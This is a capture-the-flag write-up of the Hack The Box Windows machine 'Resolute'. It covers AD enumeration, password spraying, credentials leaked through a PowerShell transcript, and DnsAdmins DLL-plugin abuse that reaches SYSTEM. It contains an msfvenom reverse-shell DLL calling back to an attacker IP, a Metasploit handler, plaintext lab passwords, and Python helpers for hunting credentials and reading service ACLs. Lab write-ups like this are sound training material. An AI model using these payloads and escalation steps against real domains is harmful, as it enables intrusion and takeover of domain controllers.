Resolute is a medium difficulty Windows machine that features Active Directory. The Active Directory anonymous bind is used to obtain a password that the sysadmins set for new user accounts, although it seems that the password for that account has since changed. A password spray reveals that this password is still in use for another domain user account, which gives us access to the system over WinRM. A PowerShell transcript log is discovered, which has captured credentials passed on the command line. This is used to move laterally to a user that is a member of the DnsAdmins group. This group has the ability to specify that the DNS Server service loads a plugin DLL. After restarting the DNS service, we achieve command execution on the domain controller in the context of NT AUTHORITY\SYSTEM.
Enumeration
Scope
IP Address: 10.10.10.169
Nmap Scan
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p- --min-rate 10000 $ip -Pn
PORT STATE SERVICE REASON
53/tcp open domain syn-ack
135/tcp open msrpc syn-ack
139/tcp open netbios-ssn syn-ack
445/tcp open microsoft-ds syn-ack
5985/tcp open wsman syn-ack
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ sudo nmap -sU $ip --min-rate 10000 --open -v -oN udp-scan -p1-10000
PORT STATE SERVICE
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Cascade]
└─$ nmap -p53,88,135,139,389,445,5985 -sCV $ip -Pn -oN Nmap/script-scan
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-11 02:24:26Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-07-11T02:24:32
|_ start_date: 2024-07-11T02:18:59
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 2h27m07s, deviation: 4h02m31s, median: 7m06s
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: Resolute
| NetBIOS computer name: RESOLUTE\x00
| Domain name: megabank.local
| Forest name: megabank.local
| FQDN: Resolute.megabank.local
|_ System time: 2024-07-10T19:24:30-07:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
* Open TCP ports: 53,88,135,139,389,445,5985
* Open UDP ports: 53,88,123,389
* Services: DNS, Kerberos, LDAP, RPC, SMB, WinRM
* Version: Windows Server 2016 Standard 14393
* Important notes: Domain: megabank.local, FQDN: Resolute.megabank.local
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ impacket-GetNPUsers megabank.local/ -dc-ip $ip -no-pass -request -format hashcat -usersfile users.lst
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
<snip>
[-] User sunita doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User abigail doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User marcus doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sally doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User fred doesn't have UF_DONT_REQUIRE_PREAUTH set
<snip>
Initial Access
After exhausting the usual options for a foothold, I went back to the user information gathered with rpcclient to check whether a password had been left in a description field or similar:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ for rid in $(cat rid.lst); do rpcclient -U "%" $ip -c "queryuser $rid" | tee -a rpc.output;done
<snip>
User Name : marko
Full Name : Marko Novak
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description : Account created. Password set to Welcome123!
Workstations:
Comment :
Remote Dial :
<snip>
The description gives us the password Welcome123!. Let's confirm access with user marko. It turns out marko's password has since been changed, but spraying Welcome123! across the user list shows it is still valid for melanie, who can log in over WinRM.
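Rather than eyeballing rpc.output for all 28 users, the description and comment fields can be scanned automatically. The following is an added example written for this page, not part of the original writeup: it parses the concatenated queryuser output into one record per user and reports any field that looks like it carries a password. The sample text is constructed (marko's entry mirrors the one found on the box; the other users and their descriptions are invented for the demo), and the password-spotting heuristic is a simple regex, so treat its output as leads to verify rather than proof.

```python
from __future__ import annotations
import re
import sys

# Constructed sample in the layout rpcclient's "queryuser <rid>" prints (one
# "Label : value" line per field, records concatenated by the for-loop above).
# marko's entry mirrors the one found on the box; the other three users and
# their descriptions are invented for the demo.
SAMPLE_RPC_OUTPUT = """\
        User Name   :   marko
        Full Name   :   Marko Novak
        Home Drive  :
        Dir Drive   :
        Profile Path:
        Logon Script:
        Description :   Account created. Password set to Welcome123!
        Workstations:
        Comment     :
        Remote Dial :
        Logon Time               :      Wed, 31 Dec 1969 19:00:00 EST
        user_rid :      0x457
        User Name   :   melanie
        Full Name   :
        Description :
        Comment     :
        User Name   :   svc_backup
        Full Name   :   Backup Service
        Description :   pwd: B4ckup!2019 (rotate quarterly)
        Comment     :   temp password: changeme
        User Name   :   sally
        Description :   Password never expires
        Comment     :
"""

FIELD_RE = re.compile(r"^\s*([A-Za-z_][A-Za-z_ ]*?)\s*:\s*(.*?)\s*$")
# A password keyword, an optional connector ("set to", "is", ":", "="), then
# the next token, which is the candidate secret.
CRED_RE = re.compile(
    r"(?i)\b(?:password|passwd|pwd|pass)\b\s*"
    r"(?:(?:re)?set\s+to|changed\s+to|is|[:=])?\s*(\S+)")
# Tokens that follow "password" in boilerplate rather than in a credential.
NOISE = {"never", "expires", "expired", "reset", "must", "change", "changed",
         "policy", "required", "set", "to", "for", "the"}


def parse_queryuser(text: str) -> list[dict[str, str]]:
    """Split concatenated queryuser output into one dict per user.
    A new record starts at every 'User Name' line; keys are lower-cased."""
    records: list[dict[str, str]] = []
    current: dict[str, str] | None = None
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group(1).strip().lower(), m.group(2).strip()
        if key == "user name":
            current = {}
            records.append(current)
        if current is not None:
            current[key] = value
    return records


def find_credential_hints(records: list[dict[str, str]]) -> list[dict[str, str]]:
    """Report description/comment fields that look like they carry a password."""
    hits = []
    for rec in records:
        user = rec.get("user name", "?")
        for field in ("description", "comment"):
            text = rec.get(field, "")
            for m in CRED_RE.finditer(text):
                candidate = m.group(1).rstrip(".,;)")
                if candidate.lower() in NOISE:
                    continue
                hits.append({"user": user, "field": field,
                             "candidate": candidate, "text": text})
    return hits


if __name__ == "__main__":
    # With a file argument (e.g. rpc.output) scan that; otherwise use the sample.
    data = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_RPC_OUTPUT
    for h in find_credential_hints(parse_queryuser(data)):
        print(f"{h['user']:<12} {h['field']:<12} {h['candidate']:<16} <- {h['text']}")
```

Run it against the real capture with the file as the first argument; with no argument it runs over the embedded sample and reports marko's Welcome123! plus the two invented hits, while sally's "Password never expires" is correctly ignored.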
Once on a domain-joined Windows box, I run bloodhound-python to collect information about the domain and feed it to the BloodHound GUI:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ bloodhound-python -u 'melanie' -p 'Welcome123!' -ns $ip -d megabank.local -c all
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: Resolute.megabank.local
INFO: Found 28 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 6 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: MS02.megabank.local
INFO: Querying computer: Resolute.megabank.local
INFO: Done in 00M 20S
Start the neo4j database, launch BloodHound to open the GUI, and upload the collected data as a zip file.
The user ryan has a profile on the box, so let's look him up in BloodHound:
*Evil-WinRM* PS C:\Users> dir
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/25/2019 10:43 AM Administrator
d----- 12/4/2019 2:46 AM melanie
d-r--- 11/20/2016 6:39 PM Public
d----- 9/27/2019 7:05 AM ryan
Click "Unrolled Group Membership" to see nested group memberships.
ryan is a member of the DnsAdmins group through nested group membership, so if we can take over this account the path to Domain Admins is clear.
I found no database, PowerShell history file, stored credentials or scripts lying around. One trick I always apply on Windows machines, just as on Linux, is to look for hidden files:
*Evil-WinRM* PS C:\> ls -Force
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--hs- 12/3/2019 6:40 AM $RECYCLE.BIN
d--hsl 9/25/2019 10:17 AM Documents and Settings
d----- 9/25/2019 6:19 AM PerfLogs
d-r--- 9/25/2019 12:39 PM Program Files
d----- 11/20/2016 6:36 PM Program Files (x86)
d--h-- 9/25/2019 10:48 AM ProgramData
d--h-- 12/3/2019 6:32 AM PSTranscripts
d--hs- 9/25/2019 10:17 AM Recovery
d--hs- 9/25/2019 6:25 AM System Volume Information
d-r--- 12/4/2019 2:46 AM Users
d----- 12/4/2019 5:15 AM Windows
-arhs- 11/20/2016 5:59 PM 389408 bootmgr
-a-hs- 7/16/2016 6:10 AM 1 BOOTNXT
-a-hs- 7/10/2024 7:18 PM 402653184 pagefile.sys
PSTranscripts is not a standard directory, so let's explore it:
*Evil-WinRM* PS C:\> ls -Force C:\PSTranscripts\
Directory: C:\PSTranscripts
Mode LastWriteTime Length Name
---- ------------- ------ ----
d--h-- 12/3/2019 6:45 AM 20191203
*Evil-WinRM* PS C:\> ls -Force C:\PSTranscripts\20191203
Directory: C:\PSTranscripts\20191203
Mode LastWriteTime Length Name
---- ------------- ------ ----
-arh-- 12/3/2019 6:45 AM 3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
That .txt file looks very interesting, let's see:
*Evil-WinRM* PS C:\> type C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
<snip>
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
<snip>
The transcript captured ryan's password (Serv3r4Admin4cc123!) because PowerShell transcription records every command line verbatim, credentials passed as arguments included; on the defensive side this means the transcript directory has to be protected like the secrets it may contain. With ryan's account we can abuse the DnsAdmins membership: the group can tell the DNS Server service to load an arbitrary DLL as a plugin, and the service runs as SYSTEM, so the DLL can add ryan to Domain Admins or give us a reverse shell as SYSTEM.
Before we start the attack, let's confirm we have control over the DNS service: DnsAdmins lets us set the plugin path, but loading the DLL requires restarting the service, and that needs start and stop rights on it.
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe sdshow DNS
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)(A;;LCRPWPDTLORC;;;S-1-5-21-1392959593-3013219662-3596683436-1105)
The last ACE grants the SID S-1-5-21-1392959593-3013219662-3596683436-1105 the rights LC, RP, WP, DT, LO and RC; on a service object RP is SERVICE_START and WP is SERVICE_STOP, so that principal can restart DNS (but not change its configuration, which would need DC). I look at BloodHound to get the SIDs of ryan and of the groups he belongs to and check that one of them matches this SID.
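To read sdshow output without decoding the ACE strings by hand, here is an added example (mine, not from the original writeup) that parses the DACL of a service SDDL with the service-specific meaning of each right abbreviation, flags rights that would let a principal reconfigure or take over the service, and checks whether a given set of SIDs (a user's SID plus those of all groups in his token, nested ones included) can start and stop it. The DNS SDDL is the one printed above; the token SID list in the demo is an assumption (a made-up RID for ryan himself next to the group SID from the sdshow output), the real values come from BloodHound.

```python
from __future__ import annotations
import re

# Rights as they apply to a service object (Windows service security docs).
# Value is (bit in the access mask, descriptive name).
SERVICE_RIGHTS = {
    "CC": (0x00000001, "SERVICE_QUERY_CONFIG"),
    "DC": (0x00000002, "SERVICE_CHANGE_CONFIG"),
    "LC": (0x00000004, "SERVICE_QUERY_STATUS"),
    "SW": (0x00000008, "SERVICE_ENUMERATE_DEPENDENTS"),
    "RP": (0x00000010, "SERVICE_START"),
    "WP": (0x00000020, "SERVICE_STOP"),
    "DT": (0x00000040, "SERVICE_PAUSE_CONTINUE"),
    "LO": (0x00000080, "SERVICE_INTERROGATE"),
    "CR": (0x00000100, "SERVICE_USER_DEFINED_CONTROL"),
    "SD": (0x00010000, "DELETE"),
    "RC": (0x00020000, "READ_CONTROL"),
    "WD": (0x00040000, "WRITE_DAC"),
    "WO": (0x00080000, "WRITE_OWNER"),
    "GA": (0x10000000, "GENERIC_ALL"),
    "GX": (0x20000000, "GENERIC_EXECUTE"),
    "GW": (0x40000000, "GENERIC_WRITE"),
    "GR": (0x80000000, "GENERIC_READ"),
}
WELL_KNOWN_SIDS = {"SY": "NT AUTHORITY\\SYSTEM", "BA": "BUILTIN\\Administrators",
                   "IU": "Interactive", "SU": "Service", "SO": "Server Operators",
                   "AU": "Authenticated Users", "WD": "Everyone"}
# Rights that let a principal change what the service runs or rewrite its ACL.
TAKEOVER = {"DC", "WD", "WO", "GA", "GW"}
RESTART = {"RP", "WP"}

# The DACL of the DNS service exactly as printed by "sc.exe sdshow DNS" above.
DNS_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
            "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
            "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SO)"
            "(A;;LCRPWPDTLORC;;;S-1-5-21-1392959593-3013219662-3596683436-1105)")


def _split_rights(field: str) -> list[str]:
    """Turn 'CCLCSW...' or a hex mask such as '0x30' into right abbreviations."""
    if field.lower().startswith("0x"):
        mask = int(field, 16)
        return [abbr for abbr, (bit, _) in SERVICE_RIGHTS.items() if mask & bit]
    return [field[i:i + 2] for i in range(0, len(field), 2)]


def parse_service_dacl(sddl: str) -> list[dict]:
    """Return the DACL ACEs of a service SDDL string; the SACL (S:) is ignored."""
    m = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    if not m:
        return []
    aces = []
    for body in re.findall(r"\(([^)]*)\)", m.group(1)):
        parts = body.split(";")
        if len(parts) < 6:
            raise ValueError(f"malformed ACE: {body}")
        ace_type, flags, rights, _obj, _inherit, sid = parts[:6]
        abbrs = _split_rights(rights)
        aces.append({
            "type": ace_type,            # A = allow, D = deny
            "flags": flags,
            "sid": sid,
            "principal": WELL_KNOWN_SIDS.get(sid, sid),
            "rights": abbrs,
            "named": [SERVICE_RIGHTS.get(a, (0, a))[1] for a in abbrs],
            "can_restart": RESTART <= set(abbrs),
            "can_take_over": bool(TAKEOVER & set(abbrs)),
        })
    return aces


def restart_aces_for(sddl: str, token_sids: list[str]) -> list[dict]:
    """Allow ACEs granting SERVICE_START and SERVICE_STOP to any SID in the
    caller's token. A deny ACE on either right for one of those SIDs wins."""
    wanted = set(token_sids)
    aces = parse_service_dacl(sddl)
    denied = {r for a in aces if a["type"] == "D" and a["sid"] in wanted
              for r in a["rights"]}
    if denied & RESTART:
        return []
    return [a for a in aces
            if a["type"] == "A" and a["sid"] in wanted and a["can_restart"]]


if __name__ == "__main__":
    for ace in parse_service_dacl(DNS_SDDL):
        tag = " TAKEOVER" if ace["can_take_over"] else (" restart" if ace["can_restart"] else "")
        print(f"{ace['type']} {ace['principal']:<45} {' '.join(ace['rights'])}{tag}")
    # Assumed token: a placeholder RID (1337) standing in for ryan's own SID plus
    # the group SID from the sdshow output; substitute the SIDs BloodHound reports.
    token = ["S-1-5-21-1392959593-3013219662-3596683436-1337",
             "S-1-5-21-1392959593-3013219662-3596683436-1105"]
    print("can restart DNS:", bool(restart_aces_for(DNS_SDDL, token)))
```

The output makes the difference between the ACEs visible: Administrators and Server Operators get DC/WD/WO (they could repoint the service binary or rewrite its ACL), while the -1105 principal only gets start/stop, which is exactly what the plugin-DLL route needs once the DLL path has been set through DnsAdmins.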
So we can restart the DNS service. Let's start the attack.
Generate a malicious DLL that gives us a reverse shell as SYSTEM (a DLL that adds ryan to Domain Admins would work just as well), then start a handler for it:
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=10.10.16.3 lport=8443 -f dll -o shell.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 311 bytes
Final size of dll file: 9216 bytes
Saved as: shell.dll
┌──(kali㉿kali)-[~/…/HackThebox/HTB/machines/Resolute]
└─$ msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
msf6 exploit(multi/handler) > set lport 8443
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:8443
Configure the DNS service to load the DLL as its server-level plugin (the DLL has to sit somewhere the DC can load it from, for example an SMB share we host), then stop and start the service so it picks the DLL up:
sc.exe stop dns
sc.exe start dns
My first attempt failed. After a few moments I realised that a script on the box reverts everything and deletes my payload, so I chained the plugin configuration and the service restart into a single command to get the payload loaded before it was removed:
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 0.0.0.0:8443
[*] Sending stage (201798 bytes) to 10.10.10.169
[*] Meterpreter session 2 opened (10.10.16.3:8443 -> 10.10.10.169:53631) at 2024-07-10 23:40:39 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
Process 2592 created.
Channel 1 created.
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>cd C:\Users\Administrator
C:\Users\Administrator>type Desktop\root.txt
2ef8121d16eb0fabebxxxxxxxxxxxxxxxx
Root Flag: 2ef8121d16eb0fabebxxxxxxxxxxxxxxxx
Reverst.ps1
Reverst.ps1 is the script that kept undoing our work. It does the following:
* Resets the passwords of ryan, melanie and Administrator
* Resets the DNS settings
It also contains the Administrator password in plaintext.